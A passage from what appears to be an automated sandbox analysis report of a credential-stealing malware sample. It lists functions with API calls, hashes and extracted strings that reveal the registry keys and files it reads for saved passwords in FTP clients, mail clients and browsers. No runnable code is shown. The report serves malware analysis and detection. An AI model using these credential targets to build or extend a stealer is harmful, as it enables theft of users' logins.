                                                • Opcode ID: 3b85365d9d51d3d47f8819171d1d11449a9a411644e434805a5f07b44c17b6d2
                                                • Instruction ID: 29f1f953e1c0832a404ddd4bf1eb832a089b214c1547d71922d0550bed25c438
                                                • Opcode Fuzzy Hash: 3b85365d9d51d3d47f8819171d1d11449a9a411644e434805a5f07b44c17b6d2
                                                • Instruction Fuzzy Hash: 7E31A73591010ABADF126F92CC02FEEBF76AF04344F10853AB920751F1D77A9A60EB48
                                                Function 004078C8 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078DB
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040790F
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A2A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                                • API String ID: 1332880857-3870687875
                                                • Opcode ID: b0ed473e7b8700ff30b45b365e22d18518b69f4eb68bba23308813eacdd9ac23
                                                • Instruction ID: e7b8c0c935d4d0c454aa1f99ca68a1ed178d52b45ef830c738b4bbc260966493
                                                • Opcode Fuzzy Hash: b0ed473e7b8700ff30b45b365e22d18518b69f4eb68bba23308813eacdd9ac23
                                                • Instruction Fuzzy Hash: 4531F43194011CFADF216B51CC42FDD7ABABF40304F14C0BABA54740A1CBB96B91AF99
                                                Function 0040F81F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F84D
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F892
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F8AD
                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F8F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                • API String ID: 3062143572-138716004
                                                • Opcode ID: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
                                                • Instruction ID: 97e5a13185e0f9c508a72f46a089416fd48b8e24879e356ae91fef65a2890253
                                                • Opcode Fuzzy Hash: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
                                                • Instruction Fuzzy Hash: 60111F30788208BADF11BB61CC43FCD7A75AB10748F508466B648751E3DBF99AD49B48
                                                Function 0040EF6C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                • wsprintfA.USER32 ref: 0040F041
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocalwsprintf
                                                • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                                • API String ID: 988369812-1921698578
                                                • Opcode ID: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                                • Instruction ID: cd3023906f6ae057e5bdde1cd0ba176c3d04abf87e76bd78a7c681664f89a6ca
                                                • Opcode Fuzzy Hash: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                                • Instruction Fuzzy Hash: 50313A34E40209FADF11AFA1DC42EEE7A75AF00304F6085B7F410B51E1DB798BA5AB48
                                                Function 00404C51 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404C7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocDirectoryLocalWindows
                                                • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                • API String ID: 3186838798-3636168975
                                                • Opcode ID: e1180aaf9e104248c188084496e5579582a0455784a27724e84bb6210bb2b144
                                                • Instruction ID: 43e3b734b20d4af43a7562869c4868c7ee74a92454cd73f3ffe9b37604960ea0
                                                • Opcode Fuzzy Hash: e1180aaf9e104248c188084496e5579582a0455784a27724e84bb6210bb2b144
                                                • Instruction Fuzzy Hash: E841EEB4A80608BAEF123B62CC43FDD7A66DF80744F60857B7A10750F2DABD99509A5C
                                                Function 0040491B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00404931
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404965
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404A8C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostName$Password$User
                                                • API String ID: 1332880857-1253078594
                                                • Opcode ID: 4a85df01347939210b02000536b6b93f7d15e784ea2387980c8e06d266f9e334
                                                • Instruction ID: 70a3f47a41d3c5b7bb25802f3bcf3ab2eab4f79ca17ead1258ab74d3b4d68c93
                                                • Opcode Fuzzy Hash: 4a85df01347939210b02000536b6b93f7d15e784ea2387980c8e06d266f9e334
                                                • Instruction Fuzzy Hash: B131F37594011CBADF22AB61CC02BDD7ABABF84304F10C4BAB544750F1DB795B92AF88
                                                Function 00408E0D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408E20
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E54
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408F46
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                                • API String ID: 1332880857-3184955129
                                                • Opcode ID: f5b38355ca61edcf822cd5411a7ff64ac3fe564a5c6de9ab292277dc4e2fa863
                                                • Instruction ID: 379df70dab51ed1233c69cde4acd9fbee75a0c7acd1daed002fcfe2591656a96
                                                • Opcode Fuzzy Hash: f5b38355ca61edcf822cd5411a7ff64ac3fe564a5c6de9ab292277dc4e2fa863
                                                • Instruction Fuzzy Hash: 9031E33190010DBADF21AB61CD42FDD7ABABF40304F1084BAB654B41E1DE799B91AF98
                                                Function 00409DCB Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409E28
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                • API String ID: 3007406096-624000163
                                                • Opcode ID: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
                                                • Instruction ID: 7ca379dd8bd6ced9b34700e741701d984c4c6656734aaf013cc51c489d735693
                                                • Opcode Fuzzy Hash: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
                                                • Instruction Fuzzy Hash: E1011E70680209BADF21BB61CC47FDE3A699B44744F11807E7A04B51E3DFB9CA909A9D
                                                Function 0040CA59 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,3D-FTP), ref: 0040CA80
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 3D-FTP$8Ap$\3D-FTP$\SiteDesigner$sites.ini
                                                • API String ID: 1884169789-2647014798
                                                • Opcode ID: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
                                                • Instruction ID: 3a8ef14eedaa50b1c948b24bf2c7183635c18f20d59f5e60411f4875eb663bb9
                                                • Opcode Fuzzy Hash: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
                                                • Instruction Fuzzy Hash: D6119E70740105BAEF11B772CC42FAF2D599B81758F24023B7810B11E3DABCCA91A6AC
                                                Function 00401DF8 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 29stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 00401E19
                                                • lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                • lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID: GHA$GHA
                                                • API String ID: 2414487701-4188437078
                                                • Opcode ID: 34c88bd1cf41f402060629731bcca75dca71093ee9173761b317a5b5713cf568
                                                • Instruction ID: 85b7a3d42229304cf13bff08406ee8d7f14fa5e6f164b37a1fc03a90bdb793dc
                                                • Opcode Fuzzy Hash: 34c88bd1cf41f402060629731bcca75dca71093ee9173761b317a5b5713cf568
                                                • Instruction Fuzzy Hash: 38F01C75100208BFDF017F62CC81A9D3B9AAB5035CF00D52AB91519152E7BD89E48B58
                                                Function 00409C3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                                • String ID: PathToExe
                                                • API String ID: 3012581338-1982016430
                                                • Opcode ID: 73213ca5d57d2b4711005681e2f74eb1c6930d4b9632169aaf3f735d5df23248
                                                • Instruction ID: 26fdae1b99b3a41fd3c75be40dc832e850ec111ed163878dae6f9528ba595cbd
                                                • Opcode Fuzzy Hash: 73213ca5d57d2b4711005681e2f74eb1c6930d4b9632169aaf3f735d5df23248
                                                • Instruction Fuzzy Hash: BE310F7195410ABAEF017FA1CD42EEE7F75EF04304F104436BA10750F2DA799A60AB59
                                                Function 004027F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                                                • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
                                                • GlobalLock.KERNEL32(?), ref: 004028BB
                                                • GlobalUnlock.KERNEL32(?), ref: 004028DD
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                                                • String ID: Software\WinRAR
                                                • API String ID: 2536169780-224198155
                                                • Opcode ID: 3295198c31234e8877b1d9cd2fd133cac00906a26a66ff8a9dc9dec2104a8318
                                                • Instruction ID: b236df76ed398757315f06d6d85d08d7d8e67b150c60cd6550e710cec1d30196
                                                • Opcode Fuzzy Hash: 3295198c31234e8877b1d9cd2fd133cac00906a26a66ff8a9dc9dec2104a8318
                                                • Instruction Fuzzy Hash: 01211D76900109BBDF55BBA1CD46EDEBB69AF04348F108576B600B10E1D6B98B94AB18
                                                Function 0040480D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00404823
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040485C
                                                • StrStrIA.SHLWAPI(?,Line), ref: 0040488D
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404912
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID: Line
                                                • API String ID: 4012628704-1898322888
                                                • Opcode ID: 84f5e434c5f61887cc715fb1ba0726c8c6d833bb2d725b88ee3c298d36885c8a
                                                • Instruction ID: c1fe354c5df2d147472c63de0b99e33003b149c2ae87472fa03303622d3e56eb
                                                • Opcode Fuzzy Hash: 84f5e434c5f61887cc715fb1ba0726c8c6d833bb2d725b88ee3c298d36885c8a
                                                • Instruction Fuzzy Hash: 652139B590011CBACF21ABA1CC41AED7BB9BF40304F00C4B6B644B50A0DB799B969F99
                                                Function 0040E380 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E393
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E3CC
                                                • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E413
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E440
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID: .wjf
                                                • API String ID: 4012628704-198459012
                                                • Opcode ID: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
                                                • Instruction ID: 445ef7b8b1bb7aa2afab0b85c8d47674782cb6e9d867fe5de917610d2ab08f6a
                                                • Opcode Fuzzy Hash: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
                                                • Instruction Fuzzy Hash: EE110A3191011CBADF11AF51CC41AEEBBB9FF04304F0484B6B554B11A1DBB99BA1AF99
                                                Function 0040456C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004027F7: GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                                                  • Part of subcall function 004027F7: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
                                                  • Part of subcall function 004027F7: GlobalLock.KERNEL32(?), ref: 004028BB
                                                  • Part of subcall function 004027F7: GlobalUnlock.KERNEL32(?), ref: 004028DD
                                                • CoCreateGuid.OLE32(?,00000000), ref: 0040458F
                                                • wsprintfA.USER32 ref: 004045D6
                                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004045E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                                • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                • API String ID: 1852535927-1100116640
                                                • Opcode ID: 9c8c72e958f692cd5c17bb4aee1ff0ebe95c06f2e591f1655062e6d771a0606b
                                                • Instruction ID: f53fd9df19a37a7436308050770a6827e165c979ed20dd1958a16c82b6db0aed
                                                • Opcode Fuzzy Hash: 9c8c72e958f692cd5c17bb4aee1ff0ebe95c06f2e591f1655062e6d771a0606b
                                                • Instruction Fuzzy Hash: 201139A68041987DDB61E3E68C05EFFBAFC590D305B1404ABB6A0E20C2D57DD780AB39
                                                Function 00409D44 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D72
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                • API String ID: 3062143572-2631691096
                                                • Opcode ID: 31845e8f246ef1c047a1e8acefb0eee754fa816f229e193014710dde568ae4c8
                                                • Instruction ID: e7b17ff52d166462a165f3b6913ad71960ce3cd8d7ded6adb1efb220650c7e13
                                                • Opcode Fuzzy Hash: 31845e8f246ef1c047a1e8acefb0eee754fa816f229e193014710dde568ae4c8
                                                • Instruction Fuzzy Hash: 4EF06270640208BADF20EB51CC47FCD7A659B04704F10807A7644740E3DFB9CAD09A48
                                                Function 00409E81 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
